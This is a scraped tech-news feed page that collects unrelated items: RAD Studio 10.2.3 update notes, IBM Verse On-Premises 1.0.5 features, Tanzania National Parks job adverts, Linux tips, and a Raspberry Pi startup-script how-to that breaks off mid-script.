Web Installer for RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline<p>RAD Studio 10.2.3 Tokyo, build 3231 is available for installation. It is an update of Delphi 10.2 Tokyo, C++Builder 10.2 Tokyo, and RAD Studio 10.2 Tokyo available for any active Update Subscription customer. If you have already installed 10.2.3 released in March 2018, installing build 3231 will require a full uninstall and reinstall.<p>This release includes the following 10.2 Tokyo patches and hotfixes:<p><ul><li>RAD Server 10.2.3 Performance Patch (July 13th, 2018)</li><li>iOS 11.3 and CodeInsight Patch (June 26th, 2018)</li><li>Delphi - RAD Server Linux Apache Patch (May 17th, 2018)</li><li>iOS 11.3 Patch (May 8th, 2018)</li><li>C++Builder - C++ Compiler 4k Stack Allocation Patch (April 17th, 2018)</li><li>Context Help Patch (April 9th, 2018)</li><li>EMS Package Wizard Patch (March 27th, 2018)</li><li>Android Push Notification Patch (March 27th, 2018)</li></ul>Note: If you have already installed the patches listed above on top of your existing RAD Studio 10.2.3 Tokyo installation (build 2631), you do not need to install the updated 10.2.3 build (build 3231).<p>English, French, German and Japanese<p>For first time users or if you have trouble downloading this, please visit <a href="http://cc.embarcadero.com/item/30840">http://cc.embarcadero.com/item/30840</a>, and download from there.<p>Available only to registered users of RAD Studio, Delphi, C++Builder 10.2 and All-Access<p>MD5: E10A2E9CCD3AC98EF9869109E3C82329
          Not interested in snooping presets in Windows 10?      Cache   Translate Page      
Microsoft is mostly interested in you behavior online, so install any Linux and stop them from spying on you. Use win 10 for applications and games (off line that is). I know, it was difficult to abandon win 10 for surfing, but now I can not go back after using Linux for a while. It is very fast and all of the online sites run faster than win 10.
          IBM Verse on Premises 1.0.5 is out and it's a HUGE update !!      Cache   Translate Page      
IBM has released today VOP 1.0.5 and the related part-nuber is  CNWQ5ML .


I love to talk about this release because in my opinion is a HUGE update with a lot of useful features:


  • When a user files an email, Verse On-Premises can suggest folders to use based upon the user's previous selections and content contained in the email.
  • When composing an email, a user has the option to mark the email as confidential in the subject line.
  • The email compose window has a minimize and restore button that enables users to view other emails while composing a new message. This enhancement eliminates the need for users to save an email being composed as a draft while checking other email.
  • The option to empty the trash is readily available at the top of the folder or inbox.
  • The calendar can display a second time zone in the right margin, providing quick access to meeting times for two different zones.
  • The calendar view can be printed.
  • Click to chat capabilities are enhanced with an option to register a custom extension for a user-preferred chat client.
  • Extensibility and customization enhancements that enable clients to tailor the experience to meet the needs of the organization include:Color and theme modifications
  • Support for adding a submenu in the navigation bar
  • Support for optional integration with Gravatar for display pictures in the Important to Me bar, and Business Cards
  • Calendar preview capability enables the administrator to configure Verse On-Premises to preview the ongoing enhancements to the calendar experience. This capability is off by default.


My top 3 features of this release are the calendar enhancements, the customization enanchements (css themes and colors) and the integration with gravatar service. that is a standards service for online avatar images based on email resolution.

To enable gravtar integration you have to enable the following notes.ini

VOP_GK_FEATURE_182=1

and VOP will start to check the service to resolve the pics of the contacts ( below my pics and Wordpress pic resolved from gravatar, without IBM Connections profiles integration)




Another useful notes.ini it's the following to enable the new calendar event design preview

VOP_GK_FEATURE_168=1.



Another awesome new it's customers doesn't needs to upgrade Domino to V10 but 9.0.1 FP9+ could be enough:

Red Hat Enterprise Linux® and Windows™ Server 64-bit systems are supported.


The following are required:
  • IBM® Domino® V9.01, Feature Pack 9, or later 
  • IBM Connections™ V5.5, or later

Here at this link you could find the announcement letters with more details and here you could find the complete what's new with the related info and screenshots.

In my opinion if you have a Domino Server supported ,  this upgrade it's a must have !

P.S This is not all ! VOP 1.0.6 it's planned late in this year and will include the ICS calendar support! 


          Delphi 10.2.3 RAD Server Linux Apache Patch      Cache   Translate Page      
This patch resolves a number of issues pertaining to deploying RAD Server EMS packages on Linux using Delphi 10.2.3 Tokyo. In some circumstances, when deploying an EMS package to Linux, libmod_emsserver would fail to start due to an exception related with the TEndpointContext declaration.<p>The patch resolves also the following issue reported on Quality Portal:<br><a href="https://quality.embarcadero.com/browse/RSP-17907" target="_blank">RSP-17907</a> - FloatToStr does not work on Linux Apache Module<p>English, French, German and Japanese<p>Available only to registered users of RAD Studio, Delphi 10.2 (Enterprise or higher) and All-Access
          Linux compatibility in IncludeOS      Cache   Translate Page      
Comments
          System/Network Specialist Senior      Cache   Translate Page      
Winning Team - Milano - Si richiedono URGENTEMENTEcandidature per System/Network Specialist Senior con competenze e capacità di seguito indicate: Sistemista Windows senior Sistemista Linux junior Gradita competenza di Sistemista VMware Junior Tecnologie richieste - Microsoft Windows v. 2003, ...
          Senior Computer Security System Specialist - Attain, LLC - Morgantown, WV      Cache   Translate Page      
Experience in providing security solutions for desktops, laptops, mobile devices (IPHONES , Android, Tablets) and for enterprise servers (Linux, Unix, Windows,...
From Attain, LLC - Wed, 03 Oct 2018 19:41:39 GMT - View all Morgantown, WV jobs
          175 Employment Opportunities at Tanzania National parks (TANAPA) November, 2018      Cache   Translate Page      
175 Employment Opportunities at Tanzania National parks (TANAPA) November, 2018
TANZANIA NATIONAL PARKS

VACANCIES ANNOUNCEMENT
Tanzania National parks (TANAPA) is a Parastatal Organization whose mandate is to manage and regulate the use of areas designated as National Parks. The Organization currently manages sixteen National Parks which form part of larger protected ecosystems set aside to preserve Tanzania’s rich natural heritage. In her endeavor to promote professionalism, the organization seeks to recruit high caliber, results oriented and self driven professionals with integrity to fill the posts below; Nafasi za kazi TANAPA

1. Information Technology Technicians - (9 posts)

(i)Entry Academic Qualifications:
Ordinary Diploma in Computer Science or Information Technology or equivalent qualifications from a recognized institution.

(ii)General Duties and Responsibilities:
Troubleshooting and repairing of hardware, operating systems and applications;
Integrating security and physical control solutions for all confidential data and systems;
Debugging pages and fixing broken links and images;
Integrating and configuring computer networking for best performance;
Addressing users complaints;

Maintaining computer systems and networks;
Running regular social promotions and campaigns and track their success through online discussion;
Implementing best practices in areas of work specialization;
Identifying the security gaps and providing relevant solutions in consultation with the ICT Supervisor;

Testing and evaluating all new technology including ARUTI-HRIS, M&E systems etc.;
Documenting, presenting technical procedures, operating methods and new systems;
Providing inputs in the preparation of departmental annual budget and plans;
Installing, supporting and maintaining existing and new hardware and software infrastructure for computer systems and networks;
Monitoring and controlling network availability and functionality and instill trouble shooting where necessary;
Preparing and submitting periodic reports; and
Performing any other related duties as may be assigned by superior.

(iii) Salary Scale: TNPSS C

(iv) Age limit: Not above 35 years of age

2. Park Ranger Grade IV – (150 posts)

i) Entry Academic Qualifications: 
Certificate of Secondary Education Examination (CSEE) with Basic, Technician Certificate in Wildlife Management or one-year course of National Service certificate.

ii) General Duties and Responsibilities
Conducting patrol activities in and around the Park;
Guarding visitors, staff and their properties and ensuring their security;
Enforcing National Parks laws, rules and regulations;
Responding to emergency situations such as rescue and instituting First Aid;
Participating in marking, clearing and protection of park boundary;
Reporting on matters relating to the security, safety and general operations of the respective section to the immediate superior;

Checking, searching, apprehending and/or arresting person/persons suspected of wildlife offences;
Ensuring safety of sentry area and handle all incidences;
Participating in routine and ad–hoc parades;
Investigating matters relating to possible wildlife offences and give evidence before the court of law;
Participating in joint protection activities with other wildlife institutions and law enforcement agencies in, around and cross–borders;
Participating in collaborative patrol operations with adjacent communities in protecting properties and human life;

Participating in ecological monitoring activities such as animal health monitoring, animal counts/census, weather data collection, early burning, fire suppression and GIS;
Performing minor preventive maintenance work on Park infrastructures, facilities and machines;
Ensuring that the parking bay of designated aircraft is clear of objects; or obstruction 5 minutes before arrival or departure of an aircraft;
Guiding aircraft to allocated parking stand using the designated markings;
Collecting and reporting threatening information pertaining to flights/aviation at park’s airstrips;
Responding to aircraft fires, hazardous spills and structural fires on airstrip facilities; and
Conducting screening of passengers, cargo, mail and belongings before boarding flights from park’s airstrip.

iii) Salary Scale: TAN 01

iv) Age limit: Not above 25 years of age

3. Information Systems Internal Auditor (1 Post)- Re-advertised

(i) Academic and Professional Qualifications:
Bachelor Degree in either of the following fields; Computer Science, Information Technology, Software Engineering or equivalent qualifications from a recognized institution and with Certified Information Systems Auditor (CISA). CPA (T), Microsoft Certified Solutions Expert (MCSE), Microsoft Certified Solutions Developer (MCSD), Linux Administration, Certified Information Security Manager (CISM), Certified in Risk and Information Systems Control (CRISC), Certified in the Governance of Enterprise IT (CGEIT), Project Management Professional (PMP), Certified Information Security Manager (CISM), Certified in Risk and Information Systems Control (CRISC) or Certified in the Governance of Enterprise IT (CGEIT) will be an added advantage.

(ii) Work experience:
At least 3 years of experience directly related to the duties and responsibilities specified herewith. Nafasi za ajira TANAPA

General Duties and Responsibilities
Carrying out reviews of computer information systems control;
Examining suitable and usable data on various computer networks and systems;
Assessing vulnerability in a systems network and recommending on prevention measures for security protocol breaches in the technology;
Evaluating information processing systems to determine their efficiency, accuracy and completeness;
Designing, developing and implementing computer systems audit;
Consulting with, and advising Senior Assistant Conservation Commissioner - Internal Audit on operational issues related to computerized information systems audit;

Ensuring and implementing best practices in areas of work specialization;
Reporting on organization compliance with TCRA laws and regulations;

Conducting computer systems investigative audits;
Preparing internal audit reports, working papers and audit files;
Making follow up on audits queries, both internal and external to monitor management’s intervention; and
Performing any other related duties as assigned by superior.

(i) Salary Scale: TNPSS F

(ii) Age limit: Not above 35 years of age

4. Civil Engineer (3 Posts) Re-advertised

(i) Academic and Professional Qualifications: Bachelor Degree in Civil Engineering from a recognized Institution. Must be registered by the Engineer Registration Board (ERB) as a Graduate Engineer.

(ii) General Duties and Responsibilities:
Preparing relevant designs, cost estimates for projects in the Park or at the corporate level;
Advising and supervising projects under construction and ensure proper choice of materials and equipment;
Identifying and requesting requirements for civil work;
Preparing specification and technical reports for projects and other activities in the related field;
Participate in preparation of annual budget;
Ensuring and implementing best practices in areas of work specialization;

Performing any other related duties assigned by the superior;
Preparing site plan for park development projects.
Inspecting infrastructures and preparing preventive maintenance schedules for the infrastructures;
Issuing certificate of project completion;
Coordinating construction and maintenance of airstrip infrastructure and facilities;
Providing technical advice to airstrip users on alterations or additions to existing structures; and

(iii) Salary Scale: TNPSS E

iv)Age limit: Not above 35 years of age

5. Senior Planning Officer (M & E) (2 Posts) Re-advertised

(i) Direct Entry Qualifications:
Bachelor Degree in Economics, Natural Resources Management, Land Use Planning or Economics Planning and must possess Post Graduate Diploma in Monitoring and Evaluation.

(ii) Experience:
At least five years satisfactory work in the related field.

General Duties and Responsibilities:
Studying national and global economic trend and advise the management accordingly;
Participating and ensuring EIAs/EIC are conducted to park development projects;
Conducting environmental audit and ensuring compliance to environmental standards;
Participating in the preparation of organization investment prospectus and investment guidelines;

Participating in the review and implementation of CSP and GMP’s;
Participating in coordinating preparation and review of Corporate budget;
Participating in conducting M & E of projects and plans;
Participating in coordinating and writing financial proposals;
Participating in the process of annexation of potential areas to the park;

Drafting appropriate tools and instruments to be utilized in the monitoring and reporting of programs and projects;
Preparing and submitting periodic reports on existing programs, policies and procedures and recommends measures to improve services, systems and procedures;
Participating in identification and determining project viability and setting project priorities; and
Performing any other related duties assigned by the superior.
Promoting and ensuring best practices in areas of work specialization;

(iii) Salary Scale: TNPSS G

iv) Age limit: Not above 45 years of age

6. Automotive Technicians (4 Posts)

(i) Direct Entry Qualifications: 
Holder of Ordinary Diploma in Automotive Engineering from any recognized Institution.

ii) Duties and Responsibilities:
Preparing preventive maintenance programs for plants and engines; motor vehicles, system components, equipment and tools;
Participating in preparing maintenance strategies of vehicle and machines.
Managing, controlling and guiding Artisans involved in the work section.
Establishing and conducting various software for vehicles and machines maintenance Ajira mpya TANAPA

Responsible for finding various solutions of problems to the organization vehicles and machines
Carrying out automotive duties as assigned;
Conducting overhauls, removing and installing plants and motor vehicle engines, etc, for the purpose of maintenance; and
Performing any other related duties assigned by the superior     

(iii)Salary Scale: TNPSS D

(iv)Age limit: Not above 35 years of age

7. Artisan Grade III (6 Posts) - Re-advertised

(i)Direct Entry Qualifications:
Holder of Certificate of Secondary Education Examination with Motor Vehicle Mechanics NTA level III or Relevant CBET Level in Motor Vehicles Mechanics or Auto electric from recognized Vocational Training Institution

(ii) Duties and Responsibilities:
Carrying out functions of metal work
Assisting Technicians in day to day activities;
Carrying out minor mechanical works
Identifying materials/required spares parts for the work to be done

Performing preventive or routine maintenance to motor vehicles, machine and boats
Inspecting and repairing motor vehicles, boats and machines
Carrying out functions such as metal work or painting motor vehicles
Preparing reports for day to day works implementations/status; and       
Performing any other related duties as may be assigned by superior.

(i)Salary Scale: TNPSS B

Note: For all re-advertised posts; previous applicants must re-apply to be considered.

MODE OF APPLICATION
The qualified applicants should channel their applications through Human Resources Management System (Aruti system) using a link https://onlinesystems.tanzaniaparks.go.tz:9092/career.aspx found on TANAPA website:http://www.tanzaniaparks.go.tz. Deadline for application of these posts is 26/11/2018 12.00 am.


CLICK HERE TO APPLY ONLINE

          Dell Inspiron 15 3576 Black, 15.6 ", Full HD, 1920 x 1080 pixels, Matt, Intel Core i5, i5-8250U, 8 GB, DDR4, SSD 256 GB, AMD Radeon 520, GDDR5, 2 GB, Linux, Keyboard language English, Warranty 24 month(s), Battery warranty 12 month(s) - 589,92 €       Cache   Translate Page      
thumb
          SuperSimple Video Converter 2015      Cache   Translate Page      
SuperSimple Video Converter(former Best Video Converter) is a free transcoder for your movies, videos and music.Convert videos for iPhone, Android, BlackBerry, Windows Mobile, Symbian, etc, to make them play faster and take up less memory. Prepare videos for YouTube, Facebook, Netflix, DailyMotion, MetaCafe, Vimeo and hundreds of other web sites. Create files for DVD players and set-top boxes (DVD, MKV, DivX, XviD, etc.). Extract audio from music videos. Convert music for car and home stereos (MP3, WMA, OGG, WAV, etc.). Make videos playable on Windows, Mac, Linux and other computer systems. Resize videos, change bit rate, audio format and other parameters. Choose from various output presets (profiles) or create your own. All that at lightning speed, using multiple CPU cores, MMX / SSE instructions and GPU acceleration! Uses ffmpeg.
          Opera 56.0.3051.99      Cache   Translate Page      

Opera 56.0.3051.99 — популярный бесплатный браузер, предоставляющий много удобных инструментов для навигации в Интернете.

  • Захват рабочего стола не работает должным образом.
  • Невозможно увидеть полный текст лицензии на оперу // о / кредиты.
  • «Linux» Нет разделителя вкладок.
  • Ошибка в - «ZoomButton setAddressBarModel».
  • Панель инструментов купона.

          Linux下如何随机设置MAC地址      Cache   Translate Page      
https://github.com/feross/SpoofMAC 安装这个即可,很好用。
          Ubuntu安装企业微信      Cache   Translate Page      
之前用wine自己搞很费劲,实际上DeepIn团队已经帮我们做好了完整的企业微信包,只不过是基于DeepIn Linux的,我们可以在Ubuntu上安装一个DeepIn的容器,然后再安装企业微信。 1 安装Deepin wine For Ubuntu https://github.com/wszqkzqk/deepin-wine-ubuntu 然后执行install.sh 2 安装企业微信 http://mirrors.aliyun.com/deepin/pool/non-free/d/deepin.com.weixin.work/deepin.com.weixin.work_2.4.16.1347deepin0_i386.deb 3 系统托盘图标 https://extensions.gnome.org/extension/1031/topicons/ gnome的版本在这里查看 [crayon-5be2a1fb06415185515847/]
           Microsoft porta su Linux alcune delle note e apprezzate utilità Sysinternals       Cache   Translate Page      
Mark Russinovich, oggi CTO di Microsoft Azure, è un pezzo da novanta: prima di entrare nell'azienda di Redmond fondò - insieme con Bryce Cogswell - una società chiamata Winternals che progettava e sviluppava alcune tra le più famose utilità per la gestione, l'ottimizzazione e la messa in sicurezza di Windows.
Utilità come Process Monitor e Process Explorer, che abbiamo frequentemente citato nei nostri articoli, sono proprio di Russinovich e della sua azienda Winternals che nel 2006 fu acquisita da Microsoft (il gruppo di lavoro fu chiamato Sysinternals).


Adesso Microsoft ha deciso di portare su Linux molte delle utilità Sysinternals: e anche questa è una notizia, che conferma l'interesse e i continui investimenti che la società, sotto la guida di Satya Nadella, sta rivolgendo nei confronti del 'pinguino', dell'opensource e del software libero.
Un altro recentissimo esempio: Microsoft entra in Open Invention Network e concede 60.000 suoi brevetti.

La prima utilità Sysinternals che viene portata su Linux è Procdump: essa consente di creare un dump dei processi in esecuzione o di eventuali crash di sistema al verificarsi di particolari eventi (i.e.
          RK3399 Raspberry Pi clone will launch at $39      Cache   Translate Page      
[Updated: 7PM] — Radxa has posted specs for a $39 and up, community backed “Rock Pi” Raspberry Pi lookalike with a Rockchip RK3399, USB 3.0, M.2, HDMI 2.0, and native GbE, plus optional WiFi, BT, and PoE. Radxa is prepping a Raspberry Pi pseudo clone called the Rock Pi that runs Linux or Android on […]
           Google Keep: per gestire promemoria e note, con OCR e riconoscimento vocale       Cache   Translate Page      
Insieme con Evernote e Microsoft OneNote, Google Keep è indubbiamente una delle applicazioni più utili per chi, ogni giorno, si trova a dover prendere appunti, annotare informazioni importanti (utili per la propria attività o in ambito personale), classificare e raggruppare il materiale raccolto, pianificare impegni e appuntamenti.

Scaricabile dal Play Store nel caso di Android e da questa pagina per i dispositivi iOS, il principale punto di forza di Google Keep - come peraltro delle altre applicazioni appartenenti alle medesima categoria - consiste nella possibilità di sincronizzare i dati tra più dispositivi, anche completamente diversi.
Per Windows, Linux e macOS non esiste infatti una versione installabile di Google Keep ma l'applicazione è fruibile da browser web, da questo indirizzo, previo login con il medesimo account utente Google adoperato sugli altri device.

Una nota scritta su PC, quindi, verrà immediatamente trasferita e aggiornata anche su tutti gli altri dispositivi, compresi smartphone e tablet Android e iOS.
Inutile dire che Google Keep si rivela un ottimo strumento per trasferire dati - testi, elenchi, immagini, foto, note vocali ma non documenti perché allo stato attuale l'app non permette di farlo in modo diretto.


Dalla schermata principale di Google Keep si può effettuare una ricerca rapida sui contenuti delle note in modo da trovare rapidamente le informazioni d'interesse indipendentemente dal dispositivo utilizzato e modificare la modalità di visualizzazione delle note (elenco o griglia).

Per creare una nuova nota, basta semplicemente iniziare a scrivere nell'apposita casella Scrivi una nota.
L'interfaccia è leggermente diversa tra app per dispositivi mobili e versione web di Google Keep ma le funzioni non cambiano: si possono infatti aggiungere testi, elenchi (toccando o cliccando su Caselle di controllo, immagini, disegni e addirittura registrazioni audio.


Nel caso delle registrazioni audio, il parlato verrà sottoposto a riconoscimento vocale e così come fanno i migliori sistemi speech-to-text, il testo verrà inserito all'interno della nota di Google Keep.


Selezionando Scatta foto o Scegli immagine sull'app Google Keep per i dispositivi mobili, è possibile aggiungere una foto alla nota.
          Headless RPi - prevent SD corruption      Cache   Translate Page      

Raspberry Pis are perfect when building interactive art projects (e.g. 20 printers printing ML generated tweets and often it’s nice to leave the Pi headless, i.e. without keyboard or monitor. And it’s convenient to just power up the device to start it and pull the power when its time to shut it down. However there are two minor issues - how do you get your code to start without a login and how do you precent system corruption. Thanksfully there are solutions to that.

Startup: Starting your code on startup.

There a many solutions for this but personally I like to run my code as a service. To do so add a file like the one below to /etc/rc.d/ and make it executable. This assumes your startup script lives in /home/you/mycode/run.sh and exepects to be run from that directory.

#! /bin/sh

### BEGIN INIT INFO
# Provides:             tweet_printer
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description:    Tweet stream deamon
### END INIT INFO

. /lib/lsb/init-functions

start() {
  log_action_begin_msg "Starting tweet printer daemon"
	cd /home/you/mycode/
	sh run.sh # OR python3 run.oy OR ./myexe 
  log_action_end_msg
}

stop